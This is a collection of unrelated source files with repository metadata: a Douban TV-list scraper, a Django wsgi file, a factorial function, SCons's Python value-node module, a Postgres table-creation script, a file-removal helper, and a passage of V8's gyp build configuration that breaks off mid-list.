'Referer': '',
'User-Agent': 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Mobile Safari/537.36',
}
def get_data_from_url(self, url, ref_cg):
self.headers['Referer'] = ref_cg
response = requests.get(url, headers=self.headers)
return response.content
def get_dsj_list(self, json_str):
dic = json.loads(json_str.decode())
start = dic['start']
count = dic['count']
total = dic['total']
next_start = start + count
return dic['subject_collection_items'], next_start, total
def save_dsj_list(self, dsj_list):
with open("dsj_list.txt", 'a', encoding='utf8') as f:
for dsj in dsj_list:
json.dump(dsj, f, ensure_ascii=False)
f.write("\n")
def main(self, next_start, cg, category, url_category):
# Send the request and get the response
url = self.url.format(cg, next_start)
ref_cg = category[url_category.index(cg)]
json_str = self.get_data_from_url(url, ref_cg)
# Parse the data
dsj_list, next_start, total = self.get_dsj_list(json_str)
# print(dsj_list)
# Save the TV series list to a file
self.save_dsj_list(dsj_list)
return next_start, total
def run(self):
# Prepare the TV series categories to fetch
category = ['https://m.douban.com/tv/chinese', 'https://m.douban.com/tv/tvshow', 'https://m.douban.com/tv/animation']
url_category = ['domestic', 'variety', 'animation']
for cg in url_category:
next_start = 0
while next_start is not None:
next_start, total = self.main(next_start, cg, category, url_category)
print(next_start, total)
if next_start >= total:
with open("dsj_list.txt", 'a') as f:
f.write('\n')
next_start = None
if __name__ == '__main__':
dsjs = DouBanDSJSpider()
dsjs.run()
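# Sketch: the start/count/total pagination contract that run() relies on, in
# isolation: advance the offset by the page size until it reaches total.
# The values in the example below are illustrative.
def page_offsets(total, count):
    start = 0
    while start < total:
        yield start
        start += count

# e.g. list(page_offsets(total=50, count=18)) -> [0, 18, 36]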
|
[
"xwp_fullstack@163.com"
] |
xwp_fullstack@163.com
|
1bb86785857a570e1bec4dab789b1c0965b51f50
|
937db7fa80f582a2bdb44879c89dde87ffc8e7d1
|
/chefvendor/wsgi.py
|
00810a16fe44f00d53bf954931a21e6228975a1c
|
[] |
no_license
|
labanyamukhopadhyay/KitchenExpress
|
6a261cbf3036831c856a9099c3c98ad245a8ccca
|
c48f3232c65e62690c6b0ecb83f4cbf2627c0470
|
refs/heads/master
| 2022-12-07T11:49:21.371799
| 2020-08-19T20:12:25
| 2020-08-19T20:12:25
| 288,824,269
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 171
|
py
|
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'chefvendor.settings')
application = get_wsgi_application()
|
[
"labanyam@hotmail.com"
] |
labanyam@hotmail.com
|
cd883a6a4424907b7c7dbe14fe6e5f929f954797
|
356ccad5492f6ce76b71bd27543780de773cd093
|
/recursion.py
|
31f43e9b27dc71f7cc954d21a35ccbad8b39a460
|
[] |
no_license
|
nanogoga/Porno
|
b437cb5bc002b5b1ad6a494dd90c8b14a139f6ec
|
09dbc325a6b9b95b6a9d32e0623da351aa4bd829
|
refs/heads/master
| 2020-05-30T10:28:42.052737
| 2019-06-01T00:41:27
| 2019-06-01T00:41:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 237
|
py
|
def factorial(num):
if num == 1 or num == 0:
return 1
elif num < 0:
raise ValueError(f'factorial is not defined for {num}')
return num * factorial(num - 1)
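# Quick sanity checks for the recursive factorial above (illustrative usage):
assert factorial(0) == 1
assert factorial(5) == 120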
|
[
"ingenieria@uniempresarial.local"
] |
ingenieria@uniempresarial.local
|
37455a871cc701a2f49cbc15837a86ed47ae1ba2
|
7d274ce8dae971228a23157a409b561020c22f66
|
/tools/packages/SCons/Node/Python.py
|
ef66c3c3e28134bf680d50447f46ac8437a4f6ac
|
[] |
no_license
|
Eigenlabs/EigenD-Contrib
|
a212884d4fdf9ae0e1aeb73f6311606212e02f94
|
586fe17471571802295c792697f255e6cab51b17
|
refs/heads/master
| 2020-05-17T07:54:48.668925
| 2013-02-05T10:20:56
| 2013-02-05T10:20:56
| 3,239,072
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,220
|
py
|
"""scons.Node.Python
Python nodes.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Node/Python.py 4577 2009/12/27 19:43:56 scons"
import SCons.Node
class ValueNodeInfo(SCons.Node.NodeInfoBase):
current_version_id = 1
field_list = ['csig']
def str_to_node(self, s):
return Value(s)
class ValueBuildInfo(SCons.Node.BuildInfoBase):
current_version_id = 1
class Value(SCons.Node.Node):
"""A class for Python variables, typically passed on the command line
or generated by a script, but not from a file or some other source.
"""
NodeInfo = ValueNodeInfo
BuildInfo = ValueBuildInfo
def __init__(self, value, built_value=None):
SCons.Node.Node.__init__(self)
self.value = value
if built_value is not None:
self.built_value = built_value
def str_for_display(self):
return repr(self.value)
def __str__(self):
return str(self.value)
def make_ready(self):
self.get_csig()
def build(self, **kw):
if not hasattr(self, 'built_value'):
apply (SCons.Node.Node.build, (self,), kw)
is_up_to_date = SCons.Node.Node.children_are_up_to_date
def is_under(self, dir):
# Make Value nodes get built regardless of
# what directory scons was run from. Value nodes
# are outside the filesystem:
return 1
def write(self, built_value):
"""Set the value of the node."""
self.built_value = built_value
def read(self):
"""Return the value. If necessary, the value is built."""
self.build()
if not hasattr(self, 'built_value'):
self.built_value = self.value
return self.built_value
def get_text_contents(self):
"""By the assumption that the node.built_value is a
deterministic product of the sources, the contents of a Value
are the concatenation of all the contents of its sources. As
the value need not be built when get_contents() is called, we
cannot use the actual node.built_value."""
###TODO: something reasonable about universal newlines
contents = str(self.value)
for kid in self.children(None):
contents = contents + kid.get_contents()
return contents
get_contents = get_text_contents ###TODO should return 'bytes' value
def changed_since_last_build(self, target, prev_ni):
cur_csig = self.get_csig()
try:
return cur_csig != prev_ni.csig
except AttributeError:
return 1
def get_csig(self, calc=None):
"""Because we're a Python value node and don't have a real
timestamp, we get to ignore the calculator and just use the
value contents."""
try:
return self.ninfo.csig
except AttributeError:
pass
contents = self.get_contents()
self.get_ninfo().csig = contents
return contents
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
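# Sketch: typical use of a Value node from a SConstruct, assuming a standard
# SCons environment; the target name and command below are illustrative.
from SCons.Environment import Environment

env = Environment()
version = env.Value('1.2.3')  # the target rebuilds whenever this value changes
env.Command('version.h', version,
            'echo "#define VERSION \\"$SOURCE\\"" > $TARGET')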
|
[
"jim@eigenlabs.com"
] |
jim@eigenlabs.com
|
66d03e1c7b8e69e8361800706585b491e9ae2860
|
bb9008c61cb59a4397bb6a54cbc409dc7181a114
|
/.ipynb_checkpoints/create_tables-checkpoint.py
|
158b45bf92a037da5df0f7a0af562ebaf7a5bfc6
|
[] |
no_license
|
anthonywah/Udacity_DE_Nanodegree_Project_Data_Modelling_with_Postgres
|
949ba522f95adc3e03ae8830385407ea2bd6f87f
|
7d73dce91a2eaff456c7639b063e195c33bce48d
|
refs/heads/master
| 2023-03-15T17:02:32.222063
| 2021-03-16T09:03:36
| 2021-03-16T09:03:36
| 348,086,058
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
import psycopg2
from sql_queries import create_table_queries, drop_table_queries
def create_database():
"""
- Creates and connects to the sparkifydb
- Returns the connection and cursor to sparkifydb
"""
# connect to default database
conn = psycopg2.connect("host=127.0.0.1 dbname=studentdb user=student password=student")
conn.set_session(autocommit=True)
cur = conn.cursor()
# create sparkify database with UTF8 encoding
cur.execute("DROP DATABASE IF EXISTS sparkifydb")
cur.execute("CREATE DATABASE sparkifydb WITH ENCODING 'utf8' TEMPLATE template0")
# close connection to default database
conn.close()
# connect to sparkify database
conn = psycopg2.connect("host=127.0.0.1 dbname=sparkifydb user=student password=student")
cur = conn.cursor()
return cur, conn
def drop_tables(cur, conn):
"""
Drops each table using the queries in `drop_table_queries` list.
"""
for query in drop_table_queries:
cur.execute(query)
conn.commit()
def create_tables(cur, conn):
"""
Creates each table using the queries in `create_table_queries` list.
"""
for query in create_table_queries:
cur.execute(query)
conn.commit()
def main():
"""
- Drops (if exists) and Creates the sparkify database.
- Establishes connection with the sparkify database and gets
cursor to it.
- Drops all the tables.
- Creates all tables needed.
- Finally, closes the connection.
"""
cur, conn = create_database()
drop_tables(cur, conn)
create_tables(cur, conn)
conn.close()
if __name__ == "__main__":
main()
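# Sketch: the sql_queries module imported above is not part of this file; the two
# names it must export have this shape (the songplays table here is illustrative):
songplay_table_create = """
    CREATE TABLE IF NOT EXISTS songplays (
        songplay_id SERIAL PRIMARY KEY,
        start_time TIMESTAMP NOT NULL,
        user_id INT NOT NULL
    );
"""
songplay_table_drop = "DROP TABLE IF EXISTS songplays;"
create_table_queries = [songplay_table_create]
drop_table_queries = [songplay_table_drop]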
|
[
"wahchishing@gmail.com"
] |
wahchishing@gmail.com
|
c48416fa46c02de6c6d36469537af049dc7fba3f
|
6a7dd6dc0ed8009b5ac7f5786272920e612e0954
|
/file_check.py
|
9b26d81211da576f48d5873761cf4f8ab3d1f562
|
[] |
no_license
|
Evan-Wildenhain/AWD
|
addb7512d9292d045430b379967162bbf85a8efc
|
00e4ed8b6613123cb748ec3b0e301251c2010c6c
|
refs/heads/master
| 2022-11-23T07:03:51.357712
| 2020-07-31T19:53:51
| 2020-07-31T19:53:51
| 284,117,900
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
import os
def checkIfFileExists(path):
    return os.path.exists(path)
def removeAudio(path, audio, folder_exists):
    # Create an empty marker file at path if it was not already there,
    # then delete the audio file.
    if not folder_exists:
        os.mknod(path)
    os.remove(audio)
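# Illustrative usage of the helpers above; the paths are hypothetical:
flag_exists = checkIfFileExists('/tmp/processed.flag')
if checkIfFileExists('/tmp/clip.mp3'):
    removeAudio('/tmp/processed.flag', '/tmp/clip.mp3', flag_exists)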
|
[
"ewildenhain99@gmail.com"
] |
ewildenhain99@gmail.com
|
584f91b56eeb2991b277840b57471dd34e35de4c
|
a9226a15b5254472b51433be3b7892c3e1086a92
|
/src/v8.gyp
|
38c2cf953b74ac0515acc7b37a57b8e99fef7a7b
|
[
"bzip2-1.0.6",
"BSD-3-Clause",
"SunPro"
] |
permissive
|
zhanglaocai/v8
|
0732dd8e25013298ea4ec3780a2a4114de2674c7
|
109033133152990382bcb67a8d92a7335f8c3c2f
|
refs/heads/master
| 2021-01-20T04:22:28.868140
| 2017-04-28T06:44:58
| 2017-04-28T06:47:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 87,274
|
gyp
|
# Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
{
'variables': {
'v8_code': 1,
'v8_random_seed%': 314159265,
'v8_vector_stores%': 0,
'embed_script%': "",
'warmup_script%': "",
'v8_extra_library_files%': [],
'v8_experimental_extra_library_files%': [],
'mksnapshot_exec': '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)mksnapshot<(EXECUTABLE_SUFFIX)',
'v8_os_page_size%': 0,
},
'includes': ['../gypfiles/toolchain.gypi', '../gypfiles/features.gypi', 'inspector/inspector.gypi'],
'targets': [
{
'target_name': 'v8',
'dependencies_traverse': 1,
'dependencies': ['v8_maybe_snapshot'],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
['component=="shared_library"', {
'type': '<(component)',
'sources': [
# Note: on non-Windows we still build this file so that gyp
# has some sources to link into the component.
'v8dll-main.cc',
],
'include_dirs': [
'..',
],
'defines': [
'BUILDING_V8_SHARED',
],
'direct_dependent_settings': {
'defines': [
'USING_V8_SHARED',
],
},
'conditions': [
['OS=="mac"', {
'xcode_settings': {
'OTHER_LDFLAGS': ['-dynamiclib', '-all_load']
},
}],
['soname_version!=""', {
'product_extension': 'so.<(soname_version)',
}],
],
},
{
'type': 'none',
}],
],
'direct_dependent_settings': {
'include_dirs': [
'../include',
],
},
},
{
# This rule delegates to either v8_snapshot, v8_nosnapshot, or
# v8_external_snapshot, depending on the current variables.
# The intention is to make the 'calling' rules a bit simpler.
'target_name': 'v8_maybe_snapshot',
'type': 'none',
'conditions': [
['v8_use_snapshot!="true"', {
# The dependency on v8_base should come from a transitive
# dependency however the Android toolchain requires libv8_base.a
# to appear before libv8_snapshot.a so it's listed explicitly.
'dependencies': ['v8_base', 'v8_nosnapshot'],
}],
['v8_use_snapshot=="true" and v8_use_external_startup_data==0', {
# The dependency on v8_base should come from a transitive
# dependency however the Android toolchain requires libv8_base.a
# to appear before libv8_snapshot.a so it's listed explicitly.
'dependencies': ['v8_base', 'v8_snapshot'],
}],
['v8_use_snapshot=="true" and v8_use_external_startup_data==1 and want_separate_host_toolset==0', {
'dependencies': ['v8_base', 'v8_external_snapshot'],
'inputs': [ '<(PRODUCT_DIR)/snapshot_blob.bin', ],
}],
['v8_use_snapshot=="true" and v8_use_external_startup_data==1 and want_separate_host_toolset==1', {
'dependencies': ['v8_base', 'v8_external_snapshot'],
'target_conditions': [
['_toolset=="host"', {
'inputs': [
'<(PRODUCT_DIR)/snapshot_blob_host.bin',
],
}, {
'inputs': [
'<(PRODUCT_DIR)/snapshot_blob.bin',
],
}],
],
}],
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
]
},
{
'target_name': 'v8_snapshot',
'type': 'static_library',
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
'dependencies': [
'mksnapshot#host',
'js2c#host',
],
}, {
'toolsets': ['target'],
'dependencies': [
'mksnapshot',
'js2c',
],
}],
['component=="shared_library"', {
'defines': [
'BUILDING_V8_SHARED',
],
'direct_dependent_settings': {
'defines': [
'USING_V8_SHARED',
],
},
}],
],
'dependencies': [
'v8_base',
],
'include_dirs+': [
'..',
'<(DEPTH)',
],
'sources': [
'<(SHARED_INTERMEDIATE_DIR)/libraries.cc',
'<(SHARED_INTERMEDIATE_DIR)/extras-libraries.cc',
'<(SHARED_INTERMEDIATE_DIR)/experimental-extras-libraries.cc',
'<(INTERMEDIATE_DIR)/snapshot.cc',
],
'actions': [
{
'action_name': 'run_mksnapshot',
'inputs': [
'<(mksnapshot_exec)',
],
'conditions': [
['embed_script!=""', {
'inputs': [
'<(embed_script)',
],
}],
['warmup_script!=""', {
'inputs': [
'<(warmup_script)',
],
}],
],
'outputs': [
'<(INTERMEDIATE_DIR)/snapshot.cc',
],
'variables': {
'mksnapshot_flags': [],
'conditions': [
['v8_random_seed!=0', {
'mksnapshot_flags': ['--random-seed', '<(v8_random_seed)'],
}],
['v8_vector_stores!=0', {
'mksnapshot_flags': ['--vector-stores'],
}],
],
},
'action': [
'<(mksnapshot_exec)',
'<@(mksnapshot_flags)',
'--startup_src', '<@(INTERMEDIATE_DIR)/snapshot.cc',
'<(embed_script)',
'<(warmup_script)',
],
},
],
},
{
'target_name': 'v8_nosnapshot',
'type': 'static_library',
'dependencies': [
'v8_base',
],
'include_dirs+': [
'..',
'<(DEPTH)',
],
'sources': [
'<(SHARED_INTERMEDIATE_DIR)/libraries.cc',
'<(SHARED_INTERMEDIATE_DIR)/extras-libraries.cc',
'<(SHARED_INTERMEDIATE_DIR)/experimental-extras-libraries.cc',
'snapshot/snapshot-empty.cc',
],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
'dependencies': ['js2c#host'],
}, {
'toolsets': ['target'],
'dependencies': ['js2c'],
}],
['component=="shared_library"', {
'defines': [
'BUILDING_V8_SHARED',
],
}],
]
},
{
'target_name': 'v8_external_snapshot',
'type': 'static_library',
'conditions': [
[ 'v8_use_external_startup_data==1', {
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
'dependencies': [
'mksnapshot#host',
'js2c#host',
'natives_blob',
]}, {
'toolsets': ['target'],
'dependencies': [
'mksnapshot',
'js2c',
'natives_blob',
],
}],
['component=="shared_library"', {
'defines': [
'BUILDING_V8_SHARED',
],
'direct_dependent_settings': {
'defines': [
'USING_V8_SHARED',
],
},
}],
],
'dependencies': [
'v8_base',
],
'include_dirs+': [
'..',
'<(DEPTH)',
],
'sources': [
'snapshot/natives-external.cc',
'snapshot/snapshot-external.cc',
],
'actions': [
{
'action_name': 'run_mksnapshot (external)',
'inputs': [
'<(mksnapshot_exec)',
],
'variables': {
'mksnapshot_flags': [],
'conditions': [
['v8_random_seed!=0', {
'mksnapshot_flags': ['--random-seed', '<(v8_random_seed)'],
}],
['v8_vector_stores!=0', {
'mksnapshot_flags': ['--vector-stores'],
}],
['v8_os_page_size!=0', {
'mksnapshot_flags': ['--v8_os_page_size', '<(v8_os_page_size)'],
}],
],
},
'conditions': [
['embed_script!=""', {
'inputs': [
'<(embed_script)',
],
}],
['warmup_script!=""', {
'inputs': [
'<(warmup_script)',
],
}],
['want_separate_host_toolset==1', {
'target_conditions': [
['_toolset=="host"', {
'outputs': [
'<(PRODUCT_DIR)/snapshot_blob_host.bin',
],
'action': [
'<(mksnapshot_exec)',
'<@(mksnapshot_flags)',
'--startup_blob', '<(PRODUCT_DIR)/snapshot_blob_host.bin',
'<(embed_script)',
'<(warmup_script)',
],
}, {
'outputs': [
'<(PRODUCT_DIR)/snapshot_blob.bin',
],
'action': [
'<(mksnapshot_exec)',
'<@(mksnapshot_flags)',
'--startup_blob', '<(PRODUCT_DIR)/snapshot_blob.bin',
'<(embed_script)',
'<(warmup_script)',
],
}],
],
}, {
'outputs': [
'<(PRODUCT_DIR)/snapshot_blob.bin',
],
'action': [
'<(mksnapshot_exec)',
'<@(mksnapshot_flags)',
'--startup_blob', '<(PRODUCT_DIR)/snapshot_blob.bin',
'<(embed_script)',
'<(warmup_script)',
],
}],
],
},
],
}],
],
},
{
'target_name': 'v8_base',
'type': 'static_library',
'dependencies': [
'v8_libbase',
'v8_libsampler',
'inspector/inspector.gyp:protocol_generated_sources#target',
'inspector/inspector.gyp:inspector_injected_script#target',
'inspector/inspector.gyp:inspector_debugger_script#target',
],
'objs': ['foo.o'],
'variables': {
'optimize': 'max',
},
'include_dirs+': [
'..',
'<(DEPTH)',
'<(SHARED_INTERMEDIATE_DIR)'
],
'sources': [ ### gcmole(all) ###
'<@(inspector_all_sources)',
'../include/v8-debug.h',
'../include/v8-platform.h',
'../include/v8-profiler.h',
'../include/v8-testing.h',
'../include/v8-util.h',
'../include/v8-value-serializer-version.h',
'../include/v8-version-string.h',
'../include/v8-version.h',
'../include/v8.h',
'../include/v8config.h',
'accessors.cc',
'accessors.h',
'address-map.cc',
'address-map.h',
'allocation.cc',
'allocation.h',
'allocation-site-scopes.cc',
'allocation-site-scopes.h',
'api.cc',
'api.h',
'api-arguments-inl.h',
'api-arguments.cc',
'api-arguments.h',
'api-natives.cc',
'api-natives.h',
'arguments.cc',
'arguments.h',
'asmjs/asm-js.cc',
'asmjs/asm-js.h',
'asmjs/asm-names.h',
'asmjs/asm-parser.cc',
'asmjs/asm-parser.h',
'asmjs/asm-scanner.cc',
'asmjs/asm-scanner.h',
'asmjs/asm-typer.cc',
'asmjs/asm-typer.h',
'asmjs/asm-types.cc',
'asmjs/asm-types.h',
'asmjs/asm-wasm-builder.cc',
'asmjs/asm-wasm-builder.h',
'asmjs/switch-logic.h',
'asmjs/switch-logic.cc',
'assembler.cc',
'assembler.h',
'assembler-inl.h',
'assert-scope.h',
'assert-scope.cc',
'ast/ast-expression-rewriter.cc',
'ast/ast-expression-rewriter.h',
'ast/ast-function-literal-id-reindexer.cc',
'ast/ast-function-literal-id-reindexer.h',
'ast/ast-numbering.cc',
'ast/ast-numbering.h',
'ast/ast-traversal-visitor.h',
'ast/ast-type-bounds.h',
'ast/ast-types.cc',
'ast/ast-types.h',
'ast/ast-value-factory.cc',
'ast/ast-value-factory.h',
'ast/ast.cc',
'ast/ast.h',
'ast/compile-time-value.cc',
'ast/compile-time-value.h',
'ast/context-slot-cache.cc',
'ast/context-slot-cache.h',
'ast/modules.cc',
'ast/modules.h',
'ast/prettyprinter.cc',
'ast/prettyprinter.h',
'ast/scopes.cc',
'ast/scopes.h',
'ast/variables.cc',
'ast/variables.h',
'background-parsing-task.cc',
'background-parsing-task.h',
'bailout-reason.cc',
'bailout-reason.h',
'basic-block-profiler.cc',
'basic-block-profiler.h',
'bignum-dtoa.cc',
'bignum-dtoa.h',
'bignum.cc',
'bignum.h',
'bit-vector.cc',
'bit-vector.h',
'bootstrapper.cc',
'bootstrapper.h',
'builtins/builtins-api.cc',
'builtins/builtins-arguments-gen.cc',
'builtins/builtins-arguments-gen.h',
'builtins/builtins-arraybuffer.cc',
'builtins/builtins-array.cc',
'builtins/builtins-array-gen.cc',
'builtins/builtins-async-function-gen.cc',
'builtins/builtins-async-generator-gen.cc',
'builtins/builtins-async-iterator-gen.cc',
'builtins/builtins-async-gen.cc',
'builtins/builtins-async-gen.h',
'builtins/builtins-boolean.cc',
'builtins/builtins-boolean-gen.cc',
'builtins/builtins-call.cc',
'builtins/builtins-call-gen.cc',
'builtins/builtins-callsite.cc',
'builtins/builtins-console.cc',
'builtins/builtins-console-gen.cc',
'builtins/builtins-constructor-gen.cc',
'builtins/builtins-constructor-gen.h',
'builtins/builtins-constructor.h',
'builtins/builtins-conversion-gen.cc',
'builtins/builtins-dataview.cc',
'builtins/builtins-date.cc',
'builtins/builtins-date-gen.cc',
'builtins/builtins-debug.cc',
'builtins/builtins-definitions.h',
'builtins/builtins-descriptors.h',
'builtins/builtins-error.cc',
'builtins/builtins-forin-gen.cc',
'builtins/builtins-forin-gen.h',
'builtins/builtins-function.cc',
'builtins/builtins-function-gen.cc',
'builtins/builtins-generator-gen.cc',
'builtins/builtins-global.cc',
'builtins/builtins-global-gen.cc',
'builtins/builtins-handler-gen.cc',
'builtins/builtins-ic-gen.cc',
'builtins/builtins-internal.cc',
'builtins/builtins-internal-gen.cc',
'builtins/builtins-interpreter.cc',
'builtins/builtins-interpreter-gen.cc',
'builtins/builtins-json.cc',
'builtins/builtins-math.cc',
'builtins/builtins-math-gen.cc',
'builtins/builtins-number.cc',
'builtins/builtins-number-gen.cc',
'builtins/builtins-object.cc',
'builtins/builtins-object-gen.cc',
'builtins/builtins-promise-gen.cc',
'builtins/builtins-promise-gen.h',
'builtins/builtins-proxy.cc',
'builtins/builtins-reflect.cc',
'builtins/builtins-regexp.cc',
'builtins/builtins-regexp-gen.cc',
'builtins/builtins-regexp-gen.h',
'builtins/builtins-sharedarraybuffer.cc',
'builtins/builtins-sharedarraybuffer-gen.cc',
'builtins/builtins-string.cc',
'builtins/builtins-string-gen.cc',
'builtins/builtins-intl.cc',
'builtins/builtins-symbol.cc',
'builtins/builtins-symbol-gen.cc',
'builtins/builtins-typedarray.cc',
'builtins/builtins-typedarray-gen.cc',
'builtins/builtins-utils.h',
'builtins/builtins-utils-gen.h',
'builtins/builtins-wasm-gen.cc',
'builtins/builtins.cc',
'builtins/builtins.h',
'builtins/setup-builtins-internal.cc',
'cached-powers.cc',
'cached-powers.h',
'callable.h',
'cancelable-task.cc',
'cancelable-task.h',
'char-predicates.cc',
'char-predicates-inl.h',
'char-predicates.h',
'checks.h',
'code-events.h',
'code-factory.cc',
'code-factory.h',
'code-stub-assembler.cc',
'code-stub-assembler.h',
'code-stubs.cc',
'code-stubs.h',
'code-stubs-hydrogen.cc',
'code-stubs-utils.h',
'codegen.cc',
'codegen.h',
'collector.h',
'compilation-cache.cc',
'compilation-cache.h',
'compilation-dependencies.cc',
'compilation-dependencies.h',
'compilation-info.cc',
'compilation-info.h',
'compilation-statistics.cc',
'compilation-statistics.h',
'compiler/access-builder.cc',
'compiler/access-builder.h',
'compiler/access-info.cc',
'compiler/access-info.h',
'compiler/all-nodes.cc',
'compiler/all-nodes.h',
'compiler/ast-graph-builder.cc',
'compiler/ast-graph-builder.h',
'compiler/ast-loop-assignment-analyzer.cc',
'compiler/ast-loop-assignment-analyzer.h',
'compiler/basic-block-instrumentor.cc',
'compiler/basic-block-instrumentor.h',
'compiler/branch-elimination.cc',
'compiler/branch-elimination.h',
'compiler/bytecode-analysis.cc',
'compiler/bytecode-analysis.h',
'compiler/bytecode-graph-builder.cc',
'compiler/bytecode-graph-builder.h',
'compiler/bytecode-liveness-map.cc',
'compiler/bytecode-liveness-map.h',
'compiler/c-linkage.cc',
'compiler/checkpoint-elimination.cc',
'compiler/checkpoint-elimination.h',
'compiler/code-generator-impl.h',
'compiler/code-generator.cc',
'compiler/code-generator.h',
'compiler/code-assembler.cc',
'compiler/code-assembler.h',
'compiler/common-node-cache.cc',
'compiler/common-node-cache.h',
'compiler/common-operator-reducer.cc',
'compiler/common-operator-reducer.h',
'compiler/common-operator.cc',
'compiler/common-operator.h',
'compiler/control-builders.cc',
'compiler/control-builders.h',
'compiler/control-equivalence.cc',
'compiler/control-equivalence.h',
'compiler/control-flow-optimizer.cc',
'compiler/control-flow-optimizer.h',
'compiler/dead-code-elimination.cc',
'compiler/dead-code-elimination.h',
'compiler/diamond.h',
'compiler/effect-control-linearizer.cc',
'compiler/effect-control-linearizer.h',
'compiler/escape-analysis.cc',
'compiler/escape-analysis.h',
'compiler/escape-analysis-reducer.cc',
'compiler/escape-analysis-reducer.h',
'compiler/frame.cc',
'compiler/frame.h',
'compiler/frame-elider.cc',
'compiler/frame-elider.h',
'compiler/frame-states.cc',
'compiler/frame-states.h',
'compiler/gap-resolver.cc',
'compiler/gap-resolver.h',
'compiler/graph-assembler.cc',
'compiler/graph-assembler.h',
'compiler/graph-reducer.cc',
'compiler/graph-reducer.h',
'compiler/graph-trimmer.cc',
'compiler/graph-trimmer.h',
'compiler/graph-visualizer.cc',
'compiler/graph-visualizer.h',
'compiler/graph.cc',
'compiler/graph.h',
'compiler/instruction-codes.h',
'compiler/instruction-selector-impl.h',
'compiler/instruction-selector.cc',
'compiler/instruction-selector.h',
'compiler/instruction-scheduler.cc',
'compiler/instruction-scheduler.h',
'compiler/instruction.cc',
'compiler/instruction.h',
'compiler/int64-lowering.cc',
'compiler/int64-lowering.h',
'compiler/js-builtin-reducer.cc',
'compiler/js-builtin-reducer.h',
'compiler/js-call-reducer.cc',
'compiler/js-call-reducer.h',
'compiler/js-context-specialization.cc',
'compiler/js-context-specialization.h',
'compiler/js-create-lowering.cc',
'compiler/js-create-lowering.h',
'compiler/js-frame-specialization.cc',
'compiler/js-frame-specialization.h',
'compiler/js-generic-lowering.cc',
'compiler/js-generic-lowering.h',
'compiler/js-graph.cc',
'compiler/js-graph.h',
'compiler/js-inlining.cc',
'compiler/js-inlining.h',
'compiler/js-inlining-heuristic.cc',
'compiler/js-inlining-heuristic.h',
'compiler/js-intrinsic-lowering.cc',
'compiler/js-intrinsic-lowering.h',
'compiler/js-native-context-specialization.cc',
'compiler/js-native-context-specialization.h',
'compiler/js-operator.cc',
'compiler/js-operator.h',
'compiler/js-type-hint-lowering.cc',
'compiler/js-type-hint-lowering.h',
'compiler/js-typed-lowering.cc',
'compiler/js-typed-lowering.h',
'compiler/jump-threading.cc',
'compiler/jump-threading.h',
'compiler/linkage.cc',
'compiler/linkage.h',
'compiler/liveness-analyzer.cc',
'compiler/liveness-analyzer.h',
'compiler/live-range-separator.cc',
'compiler/live-range-separator.h',
